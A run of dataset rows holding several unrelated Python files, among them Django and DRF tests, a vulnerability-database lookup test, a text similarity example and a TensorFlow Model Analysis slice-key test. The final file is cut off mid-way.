the former is the key not found in the dispatch `table`; the latter one
is the caught exception, if re-raising would be performed. Its default
behavior is to return the key as it is.
'''
key = tuple([args[e] for e in range(0, len(args), 2)])
values = [args[o] for o in range(1, len(args), 2)]
try:
method = table[key]
return method(*values)
except KeyError as e:
return default(key, e)
|
en
| 0.912129
|
Dispatch behavior in *even* positions within `args` against mapping `table`. It accepts a variable list of arguments, however of even length, where *hashable* objects in *even* positions are used in the key for dispatching against logic container `table`, namely a mapping of functions; in parallel, objects in *odd* positions within `args` are used as values, respectively. Keyword argument `default` is a function that consumes two arguments: the former is the key not found in the dispatch `table`; the latter one is the caught exception, if re-raising would be performed. Its default behavior is to return the key as it is.
| 3.705069
| 4
|
tests/sentry/web/frontend/test_organization_api_key_settings.py
|
mitsuhiko/sentry
| 4
|
6628471
|
<reponame>mitsuhiko/sentry
from __future__ import absolute_import
from django.core.urlresolvers import reverse
from sentry.models import ApiKey
from sentry.testutils import TestCase, PermissionTestCase
class OrganizationApiKeySettingsPermissionTest(PermissionTestCase):
def setUp(self):
super(OrganizationApiKeySettingsPermissionTest, self).setUp()
key = ApiKey.objects.create(organization=self.organization)
self.path = reverse('sentry-organization-api-key-settings', args=[
self.organization.slug, key.id
])
def test_teamless_admin_cannot_load(self):
self.assert_teamless_admin_cannot_access(self.path)
def test_member_cannot_load(self):
self.assert_member_cannot_access(self.path)
def test_owner_can_load(self):
self.assert_owner_can_access(self.path)
class OrganizationApiKeySettingsTest(TestCase):
def test_renders_with_context(self):
organization = self.create_organization(name='foo', owner=self.user)
key = ApiKey.objects.create(organization=organization)
path = reverse('sentry-organization-api-key-settings', args=[
organization.slug, key.id,
])
self.login_as(self.user)
resp = self.client.get(path)
assert resp.status_code == 200
self.assertTemplateUsed(resp, 'sentry/organization-api-key-settings.html')
assert resp.context['organization'] == organization
assert resp.context['key'] == key
def test_not_found(self):
organization = self.create_organization(name='foo', owner=self.user)
path = reverse('sentry-organization-api-key-settings', args=[
organization.slug, 99999,
])
self.login_as(self.user)
resp = self.client.get(path)
assert resp.status_code == 404
|
from __future__ import absolute_import
from django.core.urlresolvers import reverse
from sentry.models import ApiKey
from sentry.testutils import TestCase, PermissionTestCase
class OrganizationApiKeySettingsPermissionTest(PermissionTestCase):
def setUp(self):
super(OrganizationApiKeySettingsPermissionTest, self).setUp()
key = ApiKey.objects.create(organization=self.organization)
self.path = reverse('sentry-organization-api-key-settings', args=[
self.organization.slug, key.id
])
def test_teamless_admin_cannot_load(self):
self.assert_teamless_admin_cannot_access(self.path)
def test_member_cannot_load(self):
self.assert_member_cannot_access(self.path)
def test_owner_can_load(self):
self.assert_owner_can_access(self.path)
class OrganizationApiKeySettingsTest(TestCase):
def test_renders_with_context(self):
organization = self.create_organization(name='foo', owner=self.user)
key = ApiKey.objects.create(organization=organization)
path = reverse('sentry-organization-api-key-settings', args=[
organization.slug, key.id,
])
self.login_as(self.user)
resp = self.client.get(path)
assert resp.status_code == 200
self.assertTemplateUsed(resp, 'sentry/organization-api-key-settings.html')
assert resp.context['organization'] == organization
assert resp.context['key'] == key
def test_not_found(self):
organization = self.create_organization(name='foo', owner=self.user)
path = reverse('sentry-organization-api-key-settings', args=[
organization.slug, 99999,
])
self.login_as(self.user)
resp = self.client.get(path)
assert resp.status_code == 404
|
none
| 1
| 2.105752
| 2
|
|
bookshelf/tests.py
|
ffkirill/library
| 0
|
6628472
|
<reponame>ffkirill/library<gh_stars>0
import typing
from django.core.files.uploadedfile import SimpleUploadedFile
from django.core.files import File
from rest_framework.test import APITestCase
from book.models import Book
from .models import BookshelfItem
Items = typing.List[BookshelfItem]
Books = typing.List[Book]
class BookshelfPositionTestCase(APITestCase):
def prepare(self):
response = self.client.post(
'/api/author/',
{'first_name': 'Name',
'middle_name': 'Middle',
'last_name': 'Last'},
format='json')
self.assertEqual(response.status_code, 201)
self.author_url = response.data['url']
response = self.client.post(
'/api/book/',
{'title': 'title',
'place_of_publication': 'place',
'publisher': 'pub',
'type_of_book': 'type',
'year': '2001-01-01',
'isbn': 1234567891230,
'content': File(SimpleUploadedFile('up.txt', b'123')),
'authors': [self.author_url],
})
self.assertEqual(response.status_code, 201)
self.book_url = response.data['url']
response = self.client.post(
'/api/bookshelf/',
{
'title': 'Bookshelf'
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.bookshelf_url = response.data['url']
def test_insert_item_btw_a_and_b(self) -> None:
self.prepare()
# Insert Item A
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '1')
# Insert Item B
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '2')
# Insert Item C between A and B
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
'position': '1/2'
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '1/2')
def test_insert_item_btw_0_and_a(self) -> None:
self.prepare()
# Insert Item A
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '1')
# Insert Item B
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
'position': '1/2'
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '1/2')
def test_change_position_a_c_b(self) -> None:
self.prepare()
# Insert Item A
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '1')
# Insert Item B
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '2')
# Insert Item C
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '3')
# Change position of C to be between A and B
payload = response.data
payload['position'] = '3/2'
response = self.client.put(
payload['url'],
payload,
format='json'
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['position'], '3/2')
# Check sequence A C B
response = self.client.get('/api/bookshelfitem/')
self.assertEqual(tuple(item['position'] for item in response.data),
('1', '3/2', '2'))
# Test filters
response = self.client.get('/api/bookshelfitem/?bookshelf=1')
self.assertEqual(tuple(item['position'] for item in response.data),
('1', '3/2', '2'))
response = self.client.get('/api/bookshelfitem/?bookshelf=22')
self.assertEqual(len(response.data), 0)
|
import typing
from django.core.files.uploadedfile import SimpleUploadedFile
from django.core.files import File
from rest_framework.test import APITestCase
from book.models import Book
from .models import BookshelfItem
Items = typing.List[BookshelfItem]
Books = typing.List[Book]
class BookshelfPositionTestCase(APITestCase):
def prepare(self):
response = self.client.post(
'/api/author/',
{'first_name': 'Name',
'middle_name': 'Middle',
'last_name': 'Last'},
format='json')
self.assertEqual(response.status_code, 201)
self.author_url = response.data['url']
response = self.client.post(
'/api/book/',
{'title': 'title',
'place_of_publication': 'place',
'publisher': 'pub',
'type_of_book': 'type',
'year': '2001-01-01',
'isbn': 1234567891230,
'content': File(SimpleUploadedFile('up.txt', b'123')),
'authors': [self.author_url],
})
self.assertEqual(response.status_code, 201)
self.book_url = response.data['url']
response = self.client.post(
'/api/bookshelf/',
{
'title': 'Bookshelf'
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.bookshelf_url = response.data['url']
def test_insert_item_btw_a_and_b(self) -> None:
self.prepare()
# Insert Item A
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '1')
# Insert Item B
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '2')
# Insert Item C between A and B
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
'position': '1/2'
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '1/2')
def test_insert_item_btw_0_and_a(self) -> None:
self.prepare()
# Insert Item A
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '1')
# Insert Item B
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
'position': '1/2'
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '1/2')
def test_change_position_a_c_b(self) -> None:
self.prepare()
# Insert Item A
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '1')
# Insert Item B
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '2')
# Insert Item C
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '3')
# Change position of C to be between A and B
payload = response.data
payload['position'] = '3/2'
response = self.client.put(
payload['url'],
payload,
format='json'
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['position'], '3/2')
# Check sequence A C B
response = self.client.get('/api/bookshelfitem/')
self.assertEqual(tuple(item['position'] for item in response.data),
('1', '3/2', '2'))
# Test filters
response = self.client.get('/api/bookshelfitem/?bookshelf=1')
self.assertEqual(tuple(item['position'] for item in response.data),
('1', '3/2', '2'))
response = self.client.get('/api/bookshelfitem/?bookshelf=22')
self.assertEqual(len(response.data), 0)
|
en
| 0.584851
|
# Insert Item A # Insert Item B # Insert Item C between A and B # Insert Item A # Insert Item B # Insert Item A # Insert Item B # Insert Item C # Change position of C to be between A and B # Check sequence A C B # Test filters
| 2.39113
| 2
|
makepy/tox.py
|
ubunatic/pimpy
| 4
|
6628473
|
<gh_stars>1-10
from makepy.shell import run, rm
import logging
log = logging.getLogger(__name__)
def tox(envlist=None):
log.info('starting tox tests for envlist: %s', envlist)
if envlist is None: run(['tox'])
else: run(['tox', '-e', envlist])
def clean(): rm('.tox')
|
from makepy.shell import run, rm
import logging
log = logging.getLogger(__name__)
def tox(envlist=None):
log.info('starting tox tests for envlist: %s', envlist)
if envlist is None: run(['tox'])
else: run(['tox', '-e', envlist])
def clean(): rm('.tox')
|
none
| 1
| 2.385447
| 2
|
|
solutions/spavanac.py
|
dx-dt/Kattis
| 0
|
6628474
|
<filename>solutions/spavanac.py
# https://open.kattis.com/problems/spavanac
import sys
input = sys.stdin.read().split()
h = int(input[0])
m = int(input[1])
if m >= 45:
print h,m-45
else:
print (h-1)%24,(m-45)%60
|
<filename>solutions/spavanac.py
# https://open.kattis.com/problems/spavanac
import sys
input = sys.stdin.read().split()
h = int(input[0])
m = int(input[1])
if m >= 45:
print h,m-45
else:
print (h-1)%24,(m-45)%60
|
en
| 0.509969
|
# https://open.kattis.com/problems/spavanac
| 2.697521
| 3
|
tests/test_database.py
|
tisnik/victimsdb-lib
| 2
|
6628475
|
<reponame>tisnik/victimsdb-lib<filename>tests/test_database.py
"""Tests for `victimsdb_lib.database` module."""
import pytest
from victimsdb_lib.database import VictimsDB
def test_from_dir(db_small_path):
"""Test VictimsDB.from_dir()."""
db = VictimsDB.from_dir(db_small_path)
assert db
def test_basic(db_small_path):
"""Test VictimsDB.cves_for() for known package."""
db = VictimsDB.from_dir(db_small_path)
cves = db.cves_for('werkzeug')
assert len(cves) == 1
assert cves[0].cve_id == 'CVE-2016-10516'
def test_basic_unknown_package(db_small_path):
"""Test VictimsDB.cves_for() for unknown package."""
db = VictimsDB.from_dir(db_small_path)
cves = db.cves_for('xyzzy_unknown_package')
assert cves is not None
assert len(cves) == 0
def test_improper_yaml_parsing(db_path_with_improper_files):
"""Test VictimsDB.cves_for() YAMLs with improper/not parseable files."""
db = VictimsDB.from_dir(db_path_with_improper_files)
cves = db.cves_for('xyzzy_unknown_package')
assert cves is not None
assert len(cves) == 0
def test_java_vulnerabilities(db_small_path):
"""Test VictimsDB.java_vulnerabilities()."""
db = VictimsDB.from_dir(db_small_path)
java_db = db.java_vulnerabilities()
cves = java_db.cves_for('com.google.guava:guava-gwt')
assert len(cves) == 1
assert cves[0].cve_id == 'CVE-2018-10237'
assert not java_db.cves_for('not-there', ecosystem='python')
def test_javascript_vulnerabilities(db_small_path):
"""Test VictimsDB.javascript_vulnerabilities()."""
db = VictimsDB.from_dir(db_small_path)
javascript_db = db.javascript_vulnerabilities()
cves = javascript_db.cves_for('moment')
assert len(cves) == 1
assert cves[0].cve_id == 'CVE-2017-18214'
assert not javascript_db.cves_for('not-there', ecosystem='python')
def test_python_vulnerabilities(db_small_path):
"""Test VictimsDB.python_vulnerabilities()."""
db = VictimsDB.from_dir(db_small_path)
python_db = db.python_vulnerabilities()
cves = python_db.cves_for('werkzeug')
assert len(cves) == 1
assert cves[0].cve_id == 'CVE-2016-10516'
assert not python_db.cves_for('not-there', ecosystem='java')
def test_len(db_small_path):
"""Test len() on VictimsDB()."""
db = VictimsDB.from_dir(db_small_path)
assert len(db) == 3
def test_getitem(db_small_path):
"""Test [] on VictimsDB()."""
db = VictimsDB.from_dir(db_small_path)
assert 'CVE-2017-18214' == db['CVE-2017-18214'].cve_id
with pytest.raises(KeyError):
db['CVE-0000-0000']
def test_iter(db_small_path):
"""Test iter() with VictimsDB()."""
db = VictimsDB.from_dir(db_small_path)
wanted = ['CVE-2018-10237', 'CVE-2017-18214', 'CVE-2016-10516']
for record in db:
assert record.cve_id in wanted
wanted.remove(record.cve_id)
def test_contains(db_small_path):
"""Test `in` with VictimsDB()."""
db = VictimsDB.from_dir(db_small_path)
assert 'CVE-2018-10237' in db
assert 'CVE-0000-0000' not in db
assert None not in db
def test_merge(db_small_path, db_python_only):
"""Test VictimsDB().merge()."""
db1 = VictimsDB.from_dir(db_small_path)
assert len(db1) == 3
db2 = VictimsDB.from_dir(db_python_only)
assert len(db2) == 2
db1.merge(db2)
assert len(db1) == 4
cve = db1['CVE-2016-10516']
assert cve.affects('werkzeug', version='0.11.10')
def test_merge_dont_keep_ours(db_small_path, db_python_only):
"""Test VictimsDB().merge(), but override our records."""
db1 = VictimsDB.from_dir(db_small_path)
db2 = VictimsDB.from_dir(db_python_only)
db1.merge(db2, keep_ours=False)
assert len(db1) == 4
cve = db1['CVE-2016-10516']
assert not cve.affects('werkzeug', version='0.11.10')
def test_read_yamls_from_git_url(git_url):
"""Test VictimsDB().from_git_url()."""
db = VictimsDB.from_git_url(git_url)
assert db
cves = db.cves_for('werkzeug')
assert len(cves) == 1
assert cves[0].cve_id == 'CVE-2016-10516'
|
"""Tests for `victimsdb_lib.database` module."""
import pytest
from victimsdb_lib.database import VictimsDB
def test_from_dir(db_small_path):
"""Test VictimsDB.from_dir()."""
db = VictimsDB.from_dir(db_small_path)
assert db
def test_basic(db_small_path):
"""Test VictimsDB.cves_for() for known package."""
db = VictimsDB.from_dir(db_small_path)
cves = db.cves_for('werkzeug')
assert len(cves) == 1
assert cves[0].cve_id == 'CVE-2016-10516'
def test_basic_unknown_package(db_small_path):
"""Test VictimsDB.cves_for() for unknown package."""
db = VictimsDB.from_dir(db_small_path)
cves = db.cves_for('xyzzy_unknown_package')
assert cves is not None
assert len(cves) == 0
def test_improper_yaml_parsing(db_path_with_improper_files):
"""Test VictimsDB.cves_for() YAMLs with improper/not parseable files."""
db = VictimsDB.from_dir(db_path_with_improper_files)
cves = db.cves_for('xyzzy_unknown_package')
assert cves is not None
assert len(cves) == 0
def test_java_vulnerabilities(db_small_path):
"""Test VictimsDB.java_vulnerabilities()."""
db = VictimsDB.from_dir(db_small_path)
java_db = db.java_vulnerabilities()
cves = java_db.cves_for('com.google.guava:guava-gwt')
assert len(cves) == 1
assert cves[0].cve_id == 'CVE-2018-10237'
assert not java_db.cves_for('not-there', ecosystem='python')
def test_javascript_vulnerabilities(db_small_path):
"""Test VictimsDB.javascript_vulnerabilities()."""
db = VictimsDB.from_dir(db_small_path)
javascript_db = db.javascript_vulnerabilities()
cves = javascript_db.cves_for('moment')
assert len(cves) == 1
assert cves[0].cve_id == 'CVE-2017-18214'
assert not javascript_db.cves_for('not-there', ecosystem='python')
def test_python_vulnerabilities(db_small_path):
"""Test VictimsDB.python_vulnerabilities()."""
db = VictimsDB.from_dir(db_small_path)
python_db = db.python_vulnerabilities()
cves = python_db.cves_for('werkzeug')
assert len(cves) == 1
assert cves[0].cve_id == 'CVE-2016-10516'
assert not python_db.cves_for('not-there', ecosystem='java')
def test_len(db_small_path):
"""Test len() on VictimsDB()."""
db = VictimsDB.from_dir(db_small_path)
assert len(db) == 3
def test_getitem(db_small_path):
"""Test [] on VictimsDB()."""
db = VictimsDB.from_dir(db_small_path)
assert 'CVE-2017-18214' == db['CVE-2017-18214'].cve_id
with pytest.raises(KeyError):
db['CVE-0000-0000']
def test_iter(db_small_path):
"""Test iter() with VictimsDB()."""
db = VictimsDB.from_dir(db_small_path)
wanted = ['CVE-2018-10237', 'CVE-2017-18214', 'CVE-2016-10516']
for record in db:
assert record.cve_id in wanted
wanted.remove(record.cve_id)
def test_contains(db_small_path):
"""Test `in` with VictimsDB()."""
db = VictimsDB.from_dir(db_small_path)
assert 'CVE-2018-10237' in db
assert 'CVE-0000-0000' not in db
assert None not in db
def test_merge(db_small_path, db_python_only):
"""Test VictimsDB().merge()."""
db1 = VictimsDB.from_dir(db_small_path)
assert len(db1) == 3
db2 = VictimsDB.from_dir(db_python_only)
assert len(db2) == 2
db1.merge(db2)
assert len(db1) == 4
cve = db1['CVE-2016-10516']
assert cve.affects('werkzeug', version='0.11.10')
def test_merge_dont_keep_ours(db_small_path, db_python_only):
"""Test VictimsDB().merge(), but override our records."""
db1 = VictimsDB.from_dir(db_small_path)
db2 = VictimsDB.from_dir(db_python_only)
db1.merge(db2, keep_ours=False)
assert len(db1) == 4
cve = db1['CVE-2016-10516']
assert not cve.affects('werkzeug', version='0.11.10')
def test_read_yamls_from_git_url(git_url):
    """from_git_url() builds a usable DB out of a git repository."""
    db = VictimsDB.from_git_url(git_url)
    assert db

    matches = db.cves_for('werkzeug')
    assert len(matches) == 1
    assert matches[0].cve_id == 'CVE-2016-10516'
|
en
| 0.413626
|
Tests for `victimsdb_lib.database` module. Test VictimsDB.from_dir(). Test VictimsDB.cves_for() for known package. Test VictimsDB.cves_for() for unknown package. Test VictimsDB.cves_for() YAMLs with improper/not parseable files. Test VictimsDB.java_vulnerabilities(). Test VictimsDB.javascript_vulnerabilities(). Test VictimsDB.python_vulnerabilities(). Test len() on VictimsDB(). Test [] on VictimsDB(). Test iter() with VictimsDB(). Test `in` with VictimsDB(). Test VictimsDB().merge(). Test VictimsDB().merge(), but override our records. Test VictimsDB().from_git_url().
| 2.65703
| 3
|
examples/word2vec_similarity.py
|
shibing624/text2vec
| 380
|
6628476
|
<filename>examples/word2vec_similarity.py
# -*- coding: utf-8 -*-
"""
@author:XuMing(<EMAIL>)
@description: Print pairwise similarity scores between two sentence lists
using three different Similarity configurations.
"""
import sys

sys.path.append('..')
from text2vec import Similarity, cos_sim


def _print_pairwise_scores(sim, left, right):
    """Score every (left, right) sentence pair with *sim* and print it.

    Args:
        sim: a text2vec Similarity instance (provides get_score()).
        left: first list of sentences.
        right: second list of sentences.
    """
    for a in left:
        for b in right:
            score = sim.get_score(a, b)
            print("{} \t\t {} \t\t Score: {:.4f}".format(a, b, score))
    print()


# Two lists of sentences
sentences1 = ['如何更换花呗绑定银行卡',
              'The cat sits outside',
              'A man is playing guitar',
              'The new movie is awesome']
sentences2 = ['花呗更改绑定银行卡',
              'The dog plays in the garden',
              'A woman watches TV',
              'The new movie is so great']

# Output the pairs with their score for each similarity backend.
# The triple-duplicated nested loops of the original are now one helper.
sim = Similarity()
_print_pairwise_scores(sim, sentences1, sentences2)

sim2 = Similarity(similarity_type='wmd', embedding_type='w2v')
_print_pairwise_scores(sim2, sentences1, sentences2)

sim3 = Similarity(similarity_type='cosine', embedding_type='sbert')
_print_pairwise_scores(sim3, sentences1, sentences2)
|
<filename>examples/word2vec_similarity.py
# -*- coding: utf-8 -*-
"""
@author:XuMing(<EMAIL>)
@description:
"""
import sys
sys.path.append('..')
from text2vec import Similarity, cos_sim
sim = Similarity()
# Two lists of sentences
sentences1 = ['如何更换花呗绑定银行卡',
'The cat sits outside',
'A man is playing guitar',
'The new movie is awesome']
sentences2 = ['花呗更改绑定银行卡',
'The dog plays in the garden',
'A woman watches TV',
'The new movie is so great']
# Output the pairs with their score
for i in range(len(sentences1)):
for j in range(len(sentences2)):
score = sim.get_score(sentences1[i], sentences2[j])
print("{} \t\t {} \t\t Score: {:.4f}".format(sentences1[i], sentences2[j], score))
print()
sim2 = Similarity(similarity_type='wmd', embedding_type='w2v')
for i in range(len(sentences1)):
for j in range(len(sentences2)):
score = sim2.get_score(sentences1[i], sentences2[j])
print("{} \t\t {} \t\t Score: {:.4f}".format(sentences1[i], sentences2[j], score))
print()
sim3 = Similarity(similarity_type='cosine', embedding_type='sbert')
for i in range(len(sentences1)):
for j in range(len(sentences2)):
score = sim3.get_score(sentences1[i], sentences2[j])
print("{} \t\t {} \t\t Score: {:.4f}".format(sentences1[i], sentences2[j], score))
print()
|
en
| 0.802135
|
# -*- coding: utf-8 -*- @author:XuMing(<EMAIL>) @description: # Two lists of sentences # Output the pairs with their score
| 3.239204
| 3
|
tensorflow_model_analysis/extractors/slice_key_extractor_test.py
|
hephaex/model-analysis
| 2
|
6628477
|
<reponame>hephaex/model-analysis<filename>tensorflow_model_analysis/extractors/slice_key_extractor_test.py
# Lint as: python3
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test for slice_key_extractor."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import apache_beam as beam
from apache_beam.testing import util
import numpy as np
import tensorflow as tf
from tensorflow_model_analysis import config
from tensorflow_model_analysis import constants
from tensorflow_model_analysis import types
from tensorflow_model_analysis.eval_saved_model import testutil
from tensorflow_model_analysis.extractors import slice_key_extractor
from tensorflow_model_analysis.slicer import slicer_lib as slicer
def make_features_dict(features_dict):
  """Wrap each feature value list in TFMA's {'node': np.array} format.

  Args:
    features_dict: mapping of feature name -> list of raw values.

  Returns:
    A new dict mapping each feature name to {'node': np.array(values)}.
  """
  return {key: {'node': np.array(value)}
          for key, value in features_dict.items()}
def create_fpls():
  """Create two fixed FeaturesPredictionsLabels fixtures for the tests."""

  def _fpl(gender, age):
    # Both fixtures share everything except gender and age.
    return types.FeaturesPredictionsLabels(
        input_ref=0,
        features=make_features_dict({
            'gender': [gender],
            'age': [age],
            'interest': ['cars'],
        }),
        predictions=make_features_dict({'kb': [1]}),
        labels=make_features_dict({'ad_risk_score': [0]}))

  return [_fpl('f', 13), _fpl('m', 10)]
def wrap_fpl(fpl):
  """Expose *fpl* under both the input key and the FPL extract key."""
  keys = (constants.INPUT_KEY, constants.FEATURES_PREDICTIONS_LABELS_KEY)
  return {key: fpl for key in keys}
class SliceTest(testutil.TensorflowModelAnalysisTest, parameterized.TestCase):
  """Tests for ExtractSliceKeys over both extracts and legacy FPL inputs."""

  # Each named case is: (name, model_names, input extracts, slice specs,
  # expected slice-key lists -- one sorted list per input extract).
  @parameterized.named_parameters(
      ('features_only', [''], [{
          constants.FEATURES_KEY:
              make_features_dict({
                  'gender': ['m'],
                  'age': [10],
                  'interest': ['cars']
              })
      }, {
          constants.FEATURES_KEY:
              make_features_dict({
                  'gender': ['f'],
                  'age': [12],
                  'interest': ['cars']
              })
      }], [slicer.SingleSliceSpec(columns=['gender'])], [[(('gender', 'm'),)],
                                                         [(('gender', 'f'),)]]),
      # Duplicate specs must not produce duplicate slice keys.
      ('duplicate_feature_keys', [''], [{
          constants.FEATURES_KEY:
              make_features_dict({
                  'gender': ['m'],
                  'age': [10],
                  'interest': ['cars']
              })
      }, {
          constants.FEATURES_KEY:
              make_features_dict({
                  'gender': ['f'],
                  'age': [12],
                  'interest': ['cars']
              })
      }], [
          slicer.SingleSliceSpec(columns=['gender']),
          slicer.SingleSliceSpec(columns=['gender'])
      ], [[(('gender', 'm'),)], [(('gender', 'f'),)]]),
      # Transformed features take precedence over raw features for slicing.
      ('transformed_features', [''], [{
          constants.FEATURES_KEY:
              make_features_dict({
                  'gender': ['m'],
                  'age': [10],
                  'interest': ['cars']
              }),
          constants.TRANSFORMED_FEATURES_KEY:
              make_features_dict({
                  'gender': ['m'],
                  'age': [10],
                  'interest': ['boats']
              })
      }, {
          constants.FEATURES_KEY:
              make_features_dict({
                  'gender': ['f'],
                  'age': [12],
                  'interest': ['cars']
              }),
          constants.TRANSFORMED_FEATURES_KEY:
              make_features_dict({
                  'gender': ['m'],
                  'age': [10],
                  'interest': ['planes']
              })
      }], [slicer.SingleSliceSpec(columns=['interest'])
          ], [[(('interest', 'boats'),)], [(('interest', 'planes'),)]]),
      # With multiple models, per-model transformed features each contribute
      # slice keys.
      ('transformed_features_with_multiple_models', ['model1', 'model2'], [{
          constants.FEATURES_KEY:
              make_features_dict({
                  'gender': ['m'],
                  'age': [10],
                  'interest': ['cars']
              }),
          constants.TRANSFORMED_FEATURES_KEY: {
              'model1': make_features_dict({'interest': ['boats']}),
              'model2': make_features_dict({'interest': ['planes']})
          }
      }, {
          constants.FEATURES_KEY:
              make_features_dict({
                  'gender': ['f'],
                  'age': [12],
                  'interest': ['planes']
              }),
          constants.TRANSFORMED_FEATURES_KEY: {
              'model1': make_features_dict({'interest': ['trains']}),
              'model2': make_features_dict({'interest': ['planes']})
          }
      }], [slicer.SingleSliceSpec(columns=['interest'])], [[
          (('interest', 'boats'),), (('interest', 'planes'),)
      ], [(('interest', 'planes'),), (('interest', 'trains'),)]]),
  )
  def testSliceKeys(self, model_names, extracts, slice_specs, expected_slices):
    """Runs ExtractSliceKeys over *extracts* and checks the slice keys."""
    eval_config = config.EvalConfig(
        model_specs=[config.ModelSpec(name=name) for name in model_names])
    with beam.Pipeline() as pipeline:
      slice_keys_extracts = (
          pipeline
          | 'CreateTestInput' >> beam.Create(extracts)
          | 'ExtractSlices' >> slice_key_extractor.ExtractSliceKeys(
              slice_spec=slice_specs, eval_config=eval_config))

      def check_result(got):
        # Beam test assertions must raise BeamAssertException to be surfaced.
        try:
          self.assertLen(got, 2)
          got_results = []
          for item in got:
            self.assertIn(constants.SLICE_KEY_TYPES_KEY, item)
            got_results.append(sorted(item[constants.SLICE_KEY_TYPES_KEY]))
          self.assertCountEqual(got_results, expected_slices)
        except AssertionError as err:
          raise util.BeamAssertException(err)

      util.assert_that(slice_keys_extracts, check_result)

  def testLegacySliceKeys(self):
    """Legacy FPL inputs produce overall + per-gender slice keys."""
    with beam.Pipeline() as pipeline:
      fpls = create_fpls()
      slice_keys_extracts = (
          pipeline
          | 'CreateTestInput' >> beam.Create(fpls)
          | 'WrapFpls' >> beam.Map(wrap_fpl)
          | 'ExtractSlices' >> slice_key_extractor.ExtractSliceKeys([
              slicer.SingleSliceSpec(),
              slicer.SingleSliceSpec(columns=['gender'])
          ]))

      def check_result(got):
        try:
          self.assertLen(got, 2)
          # () is the "Overall" (empty) slice produced by SingleSliceSpec().
          expected_results = sorted([[(), (('gender', 'f'),)],
                                     [(), (('gender', 'm'),)]])
          got_results = []
          for item in got:
            self.assertIn(constants.SLICE_KEY_TYPES_KEY, item)
            got_results.append(sorted(item[constants.SLICE_KEY_TYPES_KEY]))
          self.assertCountEqual(got_results, expected_results)
        except AssertionError as err:
          raise util.BeamAssertException(err)

      util.assert_that(slice_keys_extracts, check_result)

  def testMaterializedLegacySliceKeys(self):
    """materialize=True additionally emits human-readable slice strings."""
    with beam.Pipeline() as pipeline:
      fpls = create_fpls()
      slice_keys_extracts = (
          pipeline
          | 'CreateTestInput' >> beam.Create(fpls)
          | 'WrapFpls' >> beam.Map(wrap_fpl)
          | 'ExtractSlices' >> slice_key_extractor.ExtractSliceKeys(
              [
                  slicer.SingleSliceSpec(),
                  slicer.SingleSliceSpec(columns=['gender'])
              ],
              materialize=True))

      def check_result(got):
        try:
          self.assertLen(got, 2)
          # Materialized keys are byte strings like b'gender:f'.
          expected_results = [
              types.MaterializedColumn(
                  name=constants.SLICE_KEYS_KEY,
                  value=[b'Overall', b'gender:f']),
              types.MaterializedColumn(
                  name=constants.SLICE_KEYS_KEY,
                  value=[b'Overall', b'gender:m'])
          ]
          got_results = []
          for item in got:
            self.assertIn(constants.SLICE_KEYS_KEY, item)
            got_result = item[constants.SLICE_KEYS_KEY]
            # Sort values so comparison is order-independent.
            got_results.append(
                got_result._replace(value=sorted(got_result.value)))
          self.assertCountEqual(got_results, expected_results)
        except AssertionError as err:
